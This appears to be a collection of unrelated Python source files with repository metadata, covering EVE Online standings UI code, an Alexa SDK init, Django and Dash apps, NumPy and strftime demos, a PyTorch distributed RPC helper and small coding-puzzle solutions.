m.append((uiutil.MenuLabel('UI/Commands/ShowCompositions'), self.ShowCompositions, (node,))) elif self.sr.node.fromID in (eve.session.charid, eve.session.corpid) or util.IsNPC(self.sr.node.fromID) and self.sr.node.toID == eve.session.charid: m.append((uiutil.MenuLabel('UI/Commands/ShowTransactions'), self.ShowTransactions, (node,))) if self.sr.node.fromID == eve.session.charid: if self.sr.node.toID != self.sr.node.fromID: if addressBookSvc.IsInAddressBook(self.sr.node.toID, 'contact'): m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/EditContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'contact', True))) m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/RemoveContact'), addressBookSvc.DeleteEntryMulti, ([self.sr.node.toID], 'contact'))) else: m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/AddContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'contact'))) if self.sr.node.fromID == eve.session.corpid and const.corpRoleDirector & eve.session.corprole == const.corpRoleDirector: if self.sr.node.toID != self.sr.node.fromID and not util.IsNPC(self.sr.node.fromID): if addressBookSvc.IsInAddressBook(self.sr.node.toID, 'corpcontact'): m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/EditCorpContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'corpcontact', True))) m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/RemoveCorpContact'), addressBookSvc.DeleteEntryMulti, ([self.sr.node.toID], 'corpcontact'))) else: m.append((uiutil.MenuLabel('UI/PeopleAndPlaces/AddContact'), addressBookSvc.AddToPersonalMulti, (self.sr.node.toID, 'corpcontact'))) return m def GetHeight(self, *args): node, width = args node.height = 32 return node.height class FactionStandingEntry(uicls.SE_BaseClassCore): __guid__ = 'listentry.FactionStandingEntry' def Startup(self, *etc): self.sr.label = uicls.EveLabelMedium(text='', parent=self, left=36, top=0, state=uiconst.UI_DISABLED, maxLines=1, align=uiconst.TOPLEFT) self.sr.otherlabel = uicls.EveLabelMedium(text='', parent=self, left=36, top=0, state=uiconst.UI_DISABLED, maxLines=1, align=uiconst.BOTTOMLEFT) uicls.Line(parent=self, align=uiconst.TOBOTTOM) self.sr.iconParent = uicls.Container(parent=self, pos=(1, 0, 32, 32), align=uiconst.TOPLEFT, state=uiconst.UI_PICKCHILDREN) self.sr.infoicon = uicls.InfoIcon(size=16, left=0, top=2, parent=self, idx=0, align=uiconst.TOPRIGHT) self.sr.infoicon.OnClick = self.ShowInfo def Load(self, node): self.sr.node = node data = node self.sr.label.text = data.label self.sr.otherlabel.text = data.otherlabel toInfo = data.toInfo self.sr.iconParent.Flush() logo = None typeInfo = cfg.invtypes.Get(toInfo.typeID) iconParams = {'parent': self.sr.iconParent, 'align': uiconst.TOALL, 'state': uiconst.UI_DISABLED, 'idx': 0} logo = uiutil.GetLogoIcon(itemID=toInfo.ownerID, **iconParams) self.sr.label.left = 36 def ShowInfo(self, node = None, *args): toInfo = cfg.eveowners.Get(self.sr.node.toInfo) sm.GetService('info').ShowInfo(toInfo.typeID, toInfo.ownerID) def GetHeight(self, *args): node, width = args node.height = 32 return node.height class StandingCompositionsWnd(uicls.Window): __guid__ = 'form.StandingCompositionsWnd' default_windowID = 'standingcompositions' def ApplyAttributes(self, attributes): uicls.Window.ApplyAttributes(self, attributes) self.scope = 'station_inflight' self.SetCaption(localization.GetByLabel('UI/Standings/CompositionWindow/WindowTitle')) self.SetMinSize([342, 256]) self.SetWndIcon() self.SetTopparentHeight(0) self.sr.scroll = uicls.Scroll(parent=self.sr.main, padding=(const.defaultPadding, 
const.defaultPadding, const.defaultPadding, const.defaultPadding)) textParent = uicls.Container(name='text', parent=self.sr.main, idx=0, align=uiconst.TOTOP, height=72) self.sr.helpNote = uicls.EveLabelMedium(text=localization.GetByLabel('UI/Standings/CompositionWindow/NPCToPlayerCorp'), parent=textParent, align=uiconst.TOTOP, left=6, top=3, state=uiconst.UI_NORMAL) def Load(self, fromID, toID, purge = 0): if getattr(self, 'loading', 0): return self.loading = 1 try: self.sr.scroll.Clear() if util.IsCharacter(fromID) and util.IsCharacter(toID): caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCharacter', fromID=fromID, toID=toID) elif util.IsCharacter(fromID): caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCorp', fromID=fromID, toName=cfg.eveowners.Get(toID).name) elif util.IsCharacter(toID): caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCharacter', fromName=cfg.eveowners.Get(fromID).name, toID=toID) else: caption = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCorp', fromName=cfg.eveowners.Get(fromID).name, toName=cfg.eveowners.Get(toID).name) self.SetCaption(caption) scrolllist = [] if not self.sr.Get('data') or purge: self.sr.data = sm.RemoteSvc('standing2').GetStandingCompositions(fromID, toID) if self.sr.data: prior = 0.0 for each in self.sr.data: if each.ownerID == fromID: prior = each.standing break scrolllist.append(sm.GetService('standing').GetStandingEntry(fromID, fromID, toID, prior, showBonuses=0, label='Current Value')) for each in self.sr.data: if each.ownerID == fromID: continue charinfo = cfg.eveowners.Get(each.ownerID) scrolllist.append(sm.GetService('standing').GetStandingEntry(each.ownerID, fromID, each.ownerID, each.standing, showBonuses=0)) else: scrolllist.append(listentry.Get('Text', {'line': 1, 'text': localization.GetByLabel('UI/Standings/CompositionWindow/NoInfo')})) self.sr.scroll.Load(contentList=scrolllist) finally: self.loading = 0
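
The standing service above applies one skill-bonus blend in several places (GetEffectiveStanding, GetStandingEntry): effective = (1 - (1 - standing/10) * (1 - bonus/10)) * 10. Restated on its own so the arithmetic is visible; the values below are illustrative, not game data.

# Worked restatement of the effective-standing blend; standing and bonus
# are on the game's 0..10 scale here (the positive side, which is how the
# service applies this branch of the formula).
def effective_standing(standing, bonus):
    return (1.0 - (1.0 - standing / 10.0) * (1.0 - bonus / 10.0)) * 10.0

print(effective_standing(5.0, 2.0))   # 6.0  -- a 2.0 bonus closes 20% of the gap to 10
print(effective_standing(0.0, 2.0))   # 2.0
print(effective_standing(10.0, 2.0))  # 10.0 -- already at the cap
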
d902870ae9a1873fa7213787d5d72768ad6ec3af
dfc61cfb4e6e93c4143250691ff8279790451e59
/ask-sdk-model/ask_sdk_model/interfaces/alexa/presentation/html/__init__.py
e9fd9971909fcd092b9687de32b0104f419ab99b
[ "Apache-2.0" ]
permissive
Shreyas-vgr/alexa-apis-for-python
5c2444238ace749fc89c604e4a194cb0bf31ef78
74ea73b3b6a03fd9cb735fb8c1fb2bd961faab54
refs/heads/master
2020-11-26T04:48:25.302742
2019-12-19T03:35:26
2019-12-19T03:41:40
228,967,736
1
0
Apache-2.0
2019-12-19T03:30:10
2019-12-19T03:30:10
null
UTF-8
Python
false
false
1,091
py
# coding: utf-8

#
#  Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file
#  except in compliance with the License. A copy of the License is located at
#
#  http://aws.amazon.com/apache2.0/
#
#  or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
#  the specific language governing permissions and limitations under the License.
#
from __future__ import absolute_import

from .transformer_type import TransformerType
from .handle_message_directive import HandleMessageDirective
from .transformer import Transformer
from .runtime import Runtime
from .start_request_method import StartRequestMethod
from .start_request import StartRequest
from .message_request import MessageRequest
from .configuration import Configuration
from .start_directive import StartDirective
from .alexa_presentation_html_interface import AlexaPresentationHtmlInterface
e69877e2f09786585a92a0ab3dbd3905b3ce3ce5
cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05
/WebBrickLibs/EventHandlers/tests/TestUtils.py
156b35af8887add2352285a3dd71cb50154673ab
[ "BSD-3-Clause" ]
permissive
AndyThirtover/wb_gateway
0cb68a1f2caf7f06942f94b867ea02f4f8695492
69f9c870369085f4440033201e2fb263a463a523
refs/heads/master
2022-01-19T00:07:20.456346
2022-01-05T21:08:16
2022-01-05T21:08:16
14,687,973
0
0
null
null
null
null
UTF-8
Python
false
false
3,332
py
# Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence

# $Id: TestUtils.py 3222 2009-07-14 15:32:00Z simon.hughes $
#
# Some test helpers for testing event handlers. Uses a SuperGlobal to save state.
#

import sys
import unittest

from EventLib.Event import Event, makeEvent
from EventHandlers.Utils import *


class TestUtilsUnit(unittest.TestCase):

    def setUp(self):
        self._log = logging.getLogger("TestUtils")
        self._log.debug("\n\nsetUp")

    def tearDown(self):
        self._log.debug("\n\ntearDown")

    # Actual tests follow

    def testMakeEvent(self):
        self._log.debug("\ntestMakeEvent")
        newEvent = makeNewEvent(
            {'type': 'newtype',
             'source': 'newsource',
             'other_data': {'data': 'data', 'data1': 'data1', 'data2': 'data2'},
             'copy_other_data': {'data1': 'data1', 'data2': 'data2'}},
            makeEvent('oldType', 'oldSource', {'data1': 'olddata1'}),
            {'data2': 'xtradata2'})
        self.assertNotEqual(newEvent, None)
        self.assertEqual(newEvent.getType(), "newtype")
        self.assertEqual(newEvent.getSource(), "newsource")
        od = newEvent.getPayload()
        self.assertEqual(od['data'], "data")
        self.assertEqual(od['data1'], "olddata1")
        self.assertEqual(od['data2'], "xtradata2")

    def testMakeEventSubsitution(self):
        self._log.debug("\ntestMakeEventSubsitution")
        newEvent = makeNewEvent(
            {'type': '%(Newtype)s',
             'source': '%(Newsource)s',
             'other_data': {'data': 'data', 'data1': 'TEST%(Subdata)sTEST', 'data2': 'data2'}},
            makeEvent('oldType', 'oldSource',
                      {'data1': 'olddata1', 'Newtype': 'SubType',
                       'Newsource': 'SubSource', 'Subdata': 'SUBBEDDATA'}),
            {'data2': 'xtradata2'})
        print newEvent
        self.assertNotEqual(newEvent, None)
        self.assertEqual(newEvent.getType(), "SubType")
        self.assertEqual(newEvent.getSource(), "SubSource")
        od = newEvent.getPayload()
        self.assertEqual(od['data'], "data")
        self.assertEqual(od['data1'], "TESTSUBBEDDATATEST")

    def testDummy(self):
        return


from MiscLib import TestUtils

def getTestSuite(select="unit"):
    """
    Get test suite

    select  is one of the following:
            "unit"      return suite of unit tests only
            "component" return suite of unit and component tests
            "all"       return suite of unit, component and integration tests
            "pending"   return suite of pending tests
            name        a single named test to be run
    """
    testdict = {
        "unit": ["testMakeEvent", "testMakeEventSubsitution"],
        "component": ["testDummy"],
        "integration": ["testDummy"],
        "pending": ["testDummy"]
    }
    return TestUtils.getTestSuite(TestUtilsUnit, testdict, select=select)

# Run unit tests directly from command line
if __name__ == "__main__":
    TestUtils.runTests("TestUtils.log", getTestSuite, sys.argv)
d9b51bdf9583fa308dd667a5782de30b5a4314bc
7d675a20af47cf1d1599610197d90969a8256f5c
/ex0/env.py
e5ad17a21e801289e8dceee375f440ca4133c13d
[]
no_license
QuentinGoss/janar-tapas1
7bddd07c8888291aa28886f66f7b6a29d453893e
c2a1c6de8ffeb8051a2efd1b544fb8f6eac2e804
refs/heads/master
2020-12-26T20:59:06.623246
2020-02-15T01:46:14
2020-02-15T01:46:14
237,640,269
0
0
null
null
null
null
UTF-8
Python
false
false
91
py
# env.py
options = None
map_dir = None

# Vehicles
counter = 0
vehicles = []
complete = []
5599614cd850830f9c0dd4726214b6fcd123965e
783bda14ef99024acea3584bc19130375fec2508
/04_02_Start.py
5a73e134a03fdfaf2edc1910586ae2106d72afdf
[]
no_license
liberbell/opendata01
75d4ed22f54fb42112b02244c9bf2cfad08935ca
f1b7c33e6f61d7ca4f01cc96c4ce05c4f6fb78bf
refs/heads/master
2020-03-21T10:25:08.678066
2018-08-21T00:21:09
2018-08-21T00:21:09
138,449,774
0
0
null
null
null
null
UTF-8
Python
false
false
260
py
# Getting more control over formatting
from datetime import datetime

now = datetime.now()

print(now.strftime('%a %A %d'))
print(now.strftime('%b %B %m'))
print(now.strftime('%a %B %D'))
print(now.strftime('%H : %M : %S %p'))
print(now.strftime('%y %Y'))
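
Since the file prints whatever now() happens to be, here is the same set of directives against a fixed timestamp so the outputs are reproducible (%a/%A/%b/%B/%p are locale-dependent; the C locale is shown):

from datetime import datetime

fixed = datetime(2018, 8, 21, 9, 5, 7)       # a Tuesday
print(fixed.strftime('%a %A %d'))            # Tue Tuesday 21
print(fixed.strftime('%b %B %m'))            # Aug August 08
print(fixed.strftime('%D'))                  # 08/21/18  (month/day/year)
print(fixed.strftime('%H : %M : %S %p'))     # 09 : 05 : 07 AM
print(fixed.strftime('%y %Y'))               # 18 2018
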
bbab7556f06dd799a7a1c6cda3bc61ee1edfe69d
5f98e7c49e88ed0f1c6ea306de7d1a325129a253
/other_peoples_apps/basic_dash/dash3.py
44997a2911358a6521ac3b1c0d58f001d0ecfcf0
[]
no_license
simongarisch/basic_flask
d1e4c4dd8f4dc86e5603c9b4fc75dc6b455cdd48
5cdc5dc45a3a7c838b732e8fd068a28018f69475
refs/heads/master
2021-07-14T20:03:50.156056
2020-06-19T12:03:11
2020-06-19T12:03:11
172,444,123
1
0
null
2021-06-22T11:06:49
2019-02-25T06:04:07
Python
UTF-8
Python
false
false
965
py
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd

df = pd.read_csv('https://gist.githubusercontent.com/chriddyp/c78bf172206ce24f77d6363a2d754b59/raw/c353e8ef842413cae56ae3920b8fd78468aa4cb2/usa-agricultural-exports-2011.csv')


def generate_table(dataframe, max_rows=10):
    return html.Table([
        html.Thead(
            html.Tr([html.Th(col) for col in dataframe.columns])
        ),
        html.Tbody([
            html.Tr([
                html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
            ]) for i in range(min(len(dataframe), max_rows))
        ])
    ])


external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

app = dash.Dash(__name__, external_stylesheets=external_stylesheets)

app.layout = html.Div(children=[
    html.H4(children='US Agriculture Exports (2011)'),
    generate_table(df)
])

if __name__ == '__main__':
    app.run_server(debug=True)
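
generate_table maps a DataFrame to a static HTML table, one Tr per row up to max_rows. A self-contained check in the same module, using a tiny local frame so no network fetch is needed (the sample values are illustrative):

import pandas as pd

sample = pd.DataFrame({'state': ['Alabama', 'Alaska'],
                       'total exports': [1390.63, 13.31]})
table = generate_table(sample, max_rows=5)
# `table` is a dash_html_components.Table component tree; Dash serializes it
# to real <table>/<thead>/<tbody> markup when the layout is rendered.
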
392882b39640d468c4b7d572a0d0d27040cbf237
ff4fe07752b61aa6404f85a8b4752e21e8a5bac8
/challenge-064/lubos-kolouch/python/ch-2.py
df2d2041c3bf0af4f2b2c7edaa47e508d404a077
[]
no_license
choroba/perlweeklychallenge-club
7c7127b3380664ca829158f2b6161c2f0153dfd9
2b2c6ec6ece04737ba9a572109d5e7072fdaa14a
refs/heads/master
2023-08-10T08:11:40.142292
2023-08-06T20:44:13
2023-08-06T20:44:13
189,776,839
0
1
null
2019-06-01T20:56:32
2019-06-01T20:56:32
null
UTF-8
Python
false
false
729
py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from typing import List


def word_sequence(S: str, W: List[str]) -> List[str]:
    def helper(s: str, words: List[str]) -> List[str]:
        if not s:
            return words
        for word in W:
            if s.startswith(word):
                result = helper(s[len(word):], words + [word])
                if result:
                    return result
        return []

    result = helper(S, [])
    return result if result else [0]


S1 = "perlweeklychallenge"
W1 = ["weekly", "challenge", "perl"]
S2 = "perlandraku"
W2 = ["python", "ruby", "haskell"]

print(word_sequence(S1, W1))  # Output: ['perl', 'weekly', 'challenge']
print(word_sequence(S2, W2))  # Output: [0]
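
The helper is a genuine backtracking search, not a greedy scan: when a prefix choice strands the rest of the string, the empty list propagates up and the loop tries the next word. A case that shows it (an added illustration):

# With S = "aaa", trying "aa" first strands a lone "a", so the helper
# returns [] and the loop falls through to "aaa".
print(word_sequence("aaa", ["aa", "aaa"]))  # ['aaa']

# Worst case this is exponential in |S|; memoizing on the remaining suffix
# (e.g. functools.lru_cache keyed on s) would bound the work by the number
# of distinct suffixes times |W|.
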
1df25303d1c26a2dab78b3710ad8715b1f99e1d7
ec78f8ab63aec0753b9360715a4276a971b78a82
/py/data_analysis/np/b_indexing.py
f4b2c805ca8dc1f3bc734fb3f68db8f06f0173bc
[]
no_license
anderscui/ml
4ace7e7b8cf248042d224bd54e81b691963b2e0e
39238ba6d802df7e8bf1089ef3605cfc83b333ac
refs/heads/master
2021-06-03T16:09:55.207202
2018-11-01T18:50:49
2018-11-01T18:50:49
23,989,214
0
0
null
null
null
null
UTF-8
Python
false
false
402
py
import numpy as np
from numpy.random import randn

names = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'])
data = randn(7, 4)
print(names)
print(data)

print(names == 'Bob')
print(data[names == 'Bob'])
print(data[names == 'Bob', 2:])
print(data[names != 'Bob'])
# Boolean masks are negated with ~; unary minus on a bool array raises a
# TypeError in modern NumPy.
print(data[~(names == 'Bob')])

mask = (names == 'Bob') | (names == 'Will')
print(data[mask])

data[data < 0] = 0
print(data)
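
Worth pinning down, since it trips people up: boolean selection returns a copy, while boolean assignment writes through to the original. A short continuation of the arrays above (an added illustration, not part of the source file):

subset = data[mask]        # a new array; modifying it leaves `data` alone
subset[:] = -1
assert (data >= 0).all()   # still true: the copy absorbed the writes

data[mask] = 7             # assignment through a mask mutates `data` itself
assert (data[mask] == 7).all()
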
a7ab3031e7812b193439335991eaa94fd5f32407
94e964496acd225e1a04060a9bc9f639e6cff99c
/app/invitations/urls.py
30974ba9c9a16fa13ba9b7f1760d580f40cb79b6
[]
no_license
indigocodeit/conflictcartographer
64b6ab2c991cd3ad020c4832cdb26974d342b564
ab19b4559c1e016ef485bfa1a01df17fb15679ce
refs/heads/master
2023-03-05T00:44:03.805241
2021-02-19T08:50:23
2021-02-19T08:50:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
759
py
from django.urls import path, include
from django.conf.urls import url

from invitations.views import referralRedirect, referralSignup, handleExcelFile, fileuploadMenu, emailpreview, share

urlpatterns = [
    path("accounts/", include("django.contrib.auth.urls")),
    url("accounts/ref/(?P<refkey>[^/.]+)/$", referralRedirect, name="referral"),
    url("accounts/signup", referralSignup, name="referralSignup"),
    #path("accounts/signup",signup,name = "signup"),
    #path("accounts/bulkadd/",bulkAdd,name="bulkadd"),
    path("upload/invexcel/", handleExcelFile, name="uploadexcel"),
    path("fileupload/", fileuploadMenu, name="fileupload"),
    path("admin/invitations/emailpreview/<int:pk>/", emailpreview),
    path("api/share/", share, name="share"),
]
b3ce5a872a19efb4767bc6923d50fc1851771e87
20348bd6e61f7019a696f2497a7b3c5c2d192796
/wowmode/admin.py
5851758c22a57ac5451904cdf44597e7f7843cf6
[]
no_license
hypnopompicindex/cms
fa9c3e70de71744506d1d4ccb3bf24a3b82e8b4d
81a634ca493385000e7028de632c5d9d04eeddaa
refs/heads/master
2021-06-26T23:05:16.022544
2019-04-01T04:21:26
2019-04-01T04:21:26
128,445,653
0
0
null
null
null
null
UTF-8
Python
false
false
660
py
from django.contrib import admin

from .models import Videolist, Video
from adminsortable2.admin import SortableAdminMixin, SortableInlineAdminMixin


class VideoInline(SortableInlineAdminMixin, admin.TabularInline):
    model = Video
    readonly_fields = ('thumbnail', 'title')
    fields = ('order', 'title', 'file', 'thumbnail')
    template = "admin/wowmode/edit_inline/tabular.html"


@admin.register(Videolist)
class VideolistAdmin(SortableAdminMixin, admin.ModelAdmin):
    list_display = ['title', 'start_date', 'end_date', 'active']
    list_editable = ('active',)
    fields = ('title', 'start_date', 'end_date', 'active')
    inlines = [VideoInline]
9dc0dba873157557aab7cbf28ec4ecb79b96e2db
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/nouns/_revenue.py
d5ed97ac2bac6f928e632369e308122c3f31872d
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
342
py
# class header
class _REVENUE():

    def __init__(self,):
        self.name = "REVENUE"
        self.definitions = [u'the income that a government or company receives regularly: ']
        self.parents = []
        self.childen = []
        self.properties = []
        self.jsondata = {}

        self.specie = 'nouns'

    def run(self, obj1=[], obj2=[]):
        return self.jsondata
2284e877ba7253ab2c2663b4f0763d61698a085c
9fae6f56ff77217aca8ae405a2bb2a2245461cc4
/backend/taxi_profile/migrations/0001_initial.py
19e1622e12af2de40a9c5cc0f883cee8ec77539c
[]
no_license
crowdbotics-apps/ready-18854
7c554b307dcab02274c10e31264712f607f6f01a
e37d0a3d3909b6defe071ffd9026511ae20db53c
refs/heads/master
2022-11-06T22:56:45.127940
2020-07-13T02:29:07
2020-07-13T02:29:07
279,189,411
0
0
null
null
null
null
UTF-8
Python
false
false
3,582
py
# Generated by Django 2.2.14 on 2020-07-13 02:28

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='UserProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mobile_number', models.CharField(blank=True, max_length=20, null=True)),
                ('photo', models.URLField(blank=True, null=True)),
                ('status', models.CharField(blank=True, max_length=50, null=True)),
                ('timestamp_created', models.DateTimeField(auto_now_add=True, null=True)),
                ('last_updated', models.DateTimeField(auto_now=True, null=True)),
                ('last_login', models.DateTimeField(blank=True, null=True)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='userprofile_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Notification',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('type', models.CharField(max_length=20)),
                ('message', models.TextField()),
                ('timestamp_created', models.DateTimeField(auto_now_add=True)),
                ('users', models.ManyToManyField(related_name='notification_users', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='InviteCode',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=20)),
                ('timestamp_created', models.DateTimeField(auto_now_add=True)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitecode_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='DriverProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mobile_number', models.CharField(max_length=20)),
                ('photo', models.URLField()),
                ('driver_status', models.CharField(max_length=50)),
                ('timestamp_created', models.DateTimeField(auto_now_add=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('last_login', models.DateTimeField()),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='driverprofile_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Document',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('file', models.URLField()),
                ('description', models.TextField(blank=True, null=True)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
4dbe179017640dc1772bf32986f395dcfe46257c
c36679186f669c6e3bd1c106c96d4a17be1f5ab1
/Practice_Anisul/149.py
0787f34ea6607e53a80621276df0598ec6b76a36
[]
no_license
touhiduzzaman-tuhin/python-code-university-life
60a3d671b200a6f5222c6d176c13c5f20f013509
6d2e3d90d430faa5c83fe79e7fb1ebe516994762
refs/heads/master
2023-03-22T15:18:10.636203
2021-03-06T18:52:04
2021-03-06T18:52:04
332,467,190
0
0
null
null
null
null
UTF-8
Python
false
false
191
py
tpl = (1, 3, 6, 4, "Tuhin", "Rana", (1, 2, 3))

print(tpl)
print(tpl[0])
print(tpl[1])
print(tpl[2])
print(tpl[3])
print(tpl[4])
print(tpl[6])
print(tpl[6][1])
b06ce99b3d9241be378b1a68cabcf4a2a08191f0
d91365b9da3cbd3a4c928591f25e55e615a61ebb
/torchbiggraph/rpc.py
f8cf4cc00eeb223c99249d384e23d4f10febd204
[ "BSD-3-Clause" ]
permissive
pandeyankit83/PyTorch-BigGraph
052ff88804bba8353a12385c5547445cdb22700b
79e7fc06621ca7737689fa50c1e6cf6cea550a90
refs/heads/master
2022-12-05T02:16:52.169026
2020-06-22T17:29:36
2020-06-22T17:30:44
277,336,532
3
1
NOASSERTION
2022-11-27T03:29:15
2020-07-05T16:04:10
Python
UTF-8
Python
false
false
5,714
py
#!/usr/bin/env python3

# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.

import io
import sys
import traceback

import numpy as np
import torch
import torch.distributed as td


# FIXME: is it efficient to torch.save into a buf? It's going to have to copy
# all the tensors.
def _serialize(data):
    buf = io.BytesIO()
    torch.save(data, buf)
    data_bytes = buf.getvalue()
    # FIXME: how to properly copy bytes to ByteTensor?
    t = torch.from_numpy(np.frombuffer(data_bytes, dtype=np.uint8))
    return t


def _deserialize(t):
    data_bytes = t.numpy().tobytes()
    buf = io.BytesIO(data_bytes)
    return torch.load(buf)


def send(data, dst):
    """
    Sends an arbitrary torch-serializable object to a destination node.
    This is a blocking send, equivalent to `torch.distributed.send`.

    Args:
        data: An arbitrary torch-serializable object to be sent.
        dst: The rank of the destination node.
    """
    # FIXME: we've got to get rid of this two-pass nonsense for dynamically sized
    # send and receive.
    t = _serialize(data)
    sizet = torch.LongTensor([t.nelement()])
    td.send(sizet, dst)
    td.send(t, dst)


def recv(src=None):
    """
    Receives an arbitrary torch-serializable object from a source node.
    This is a blocking receive, `torch.distributed.recv`

    Args:
        src: The rank of the source node. If None, will receive from any rank.

    Returns:
        data: The data send from the source node.
        src: The rank of the source node.
    """
    sizet = torch.LongTensor(1)
    src = td.recv(sizet, src)
    t = torch.ByteTensor(sizet.item())
    td.recv(t, src)
    return _deserialize(t), src


_JOIN_KEY = "seU17sb9nwqDZhsH9AyW"


class Server(object):
    """Base class for an RPC server using `torch.distributed`.

    Users should subclass this class and add the server methods.

    Example:
        init_method = "file://myfile.tmp"
        num_clients = 1
        torch.distributed.init_process_group('gloo',
                                             init_method=init_method,
                                             world_size=num_clients + 1,
                                             rank=0)

        class MyServer(Server):
            def test_func(self, T, k=0):
                return ("the result is ", T + k)

        s = MyServer(num_clients)
        s.start()  # will block until all clients have called `join()`
    """

    def __init__(self, num_clients):
        """
        Args:
            num_clients: The number of clients that will call `join()` upon
                         completion.
        """
        self.num_clients = num_clients

    def start(self, groups=None):
        join_clients = []

        while True:
            rpc, src = recv()
            if rpc == _JOIN_KEY:
                join_clients += [src]
                if len(join_clients) == self.num_clients:
                    for client in join_clients:
                        # after sending the join cmd,
                        # each client waits on this ack to know everyone is done
                        # and it's safe to exit
                        send(_JOIN_KEY, client)
                    break
            else:
                F, args, kwargs = rpc
                try:
                    res = getattr(self, F)(*args, **kwargs)
                    send((False, res), src)
                except BaseException as e:
                    # should we print the exception on the server also?
                    # traceback.print_exc()
                    exc_str = traceback.format_exc()
                    send((True, (e, exc_str)), src)


class Client(object):
    """A client for connecting to a subclass of `rpc.Server`.

    Example:
        init_method = "file://myfile.tmp"
        num_clients = 1
        torch.distributed.init_process_group('gloo',
                                             init_method=init_method,
                                             world_size=num_clients + 1,
                                             rank=1)

        c = Client(MyServer, server_rank=0)
        print(c.test_func(torch.arange(0, 3), k=2))
        # ('the result is ', tensor([ 2,  3,  4]))

        c.join()
    """

    def __init__(self, server_class, server_rank):
        """
        Args:
            server_class: The class of the server object. This should be a
                          subclass of `rpc.Server`.
            server_rank: The rank of the node where the `rpc.Server` is running.
        """
        self.server_class = server_class
        self.server_rank = server_rank

    def __getattr__(self, name):
        if name not in dir(self.server_class):
            raise AttributeError(
                "%s has no attribute %s" % (self.server_class.__name__, name)
            )
        func = getattr(self.server_class, name)
        if not isinstance(func, type(lambda: 1)):  # FIXME
            raise TypeError("%s object is not callable" % (type(func)))

        def inner(*args, **kwargs):
            send((name, args, kwargs), self.server_rank)
            (is_exception, res), _src = recv(self.server_rank)
            if not is_exception:
                return res
            else:
                exc, exc_str = res
                print(exc_str, file=sys.stderr)
                raise exc

        return inner

    def join(self):
        """Should be called by each client upon completion, to ensure a clean
        exit.
        """
        send(_JOIN_KEY, self.server_rank)
        recv(self.server_rank)
b21d14a806472b97f7bf97745f271b6370e98277
8520c991dc543f5f4e1efe59ab401824173bb985
/63-unique-paths-ii/solution.py
dea9fccf6e2786fb22f3e04e49bad454437956f9
[]
no_license
katryo/leetcode
d44f70f2853c4f5ea9a462d022feb0f5436c2236
0da45559271d3dba687858b8945b3e361ecc813c
refs/heads/master
2020-03-24T12:04:53.859047
2020-02-18T04:27:55
2020-02-18T04:27:55
142,703,107
0
0
null
null
null
null
UTF-8
Python
false
false
1,783
py
# A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
#
# The robot can only move either down or right at any point in time.
# The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
#
# Now consider if some obstacles are added to the grids. How many unique paths would there be?
# An obstacle and empty space is marked as 1 and 0 respectively in the grid.
#
# Note: m and n will be at most 100.
#
# Example 1:
#
# Input:
# [
#   [0,0,0],
#   [0,1,0],
#   [0,0,0]
# ]
# Output: 2
# Explanation:
# There is one obstacle in the middle of the 3x3 grid above.
# There are two ways to reach the bottom-right corner:
